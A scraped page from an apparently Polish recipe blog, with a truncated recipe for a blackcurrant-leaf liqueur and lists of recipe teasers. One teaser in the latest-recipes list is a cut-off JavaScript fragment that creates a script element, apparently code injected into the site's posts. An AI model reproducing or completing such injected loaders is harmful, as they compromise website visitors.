Listkówka - wytrawna nalewka na liściach porzeczki.

Nalewkę na liściach czarnej porzeczek używa się do wzbogacania smaku nalewki z czarnej porzeczki czyli smorodinówki. Liście zrywa się wiosną kiedy zaczynająsię rozwijać.Składniki:liście czarnej porzeczki 15 dag (2 szklanki)alkohol 47% 1 litrWykonanie:Zebrane liście myjemy, osuszamy papierowymi ręczniczkami, rozdrabniamy. Rozdrobnione liście wkładamy do słoika, zalewamy...
Najnowsze przepisy
Kotlet wieprzowy z dodatkiem sera żółtego i jajka... ⇖ 10
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 12
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 10
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 11
Przepisy z bloga
Pyszny salceson zrobiony z tylnej golonki wieprzowej i... ⇖ 278
Sernik jest o smaku śmietankowym, upieczony na spodzie z... ⇖ 307
Taka kolorowa jajecznica, bardzo smaczna.Składniki:2 jaja... ⇖ 212
Bardzo smaczne, pachnące pierniczki przygotowywane z... ⇖ 216
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 324
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267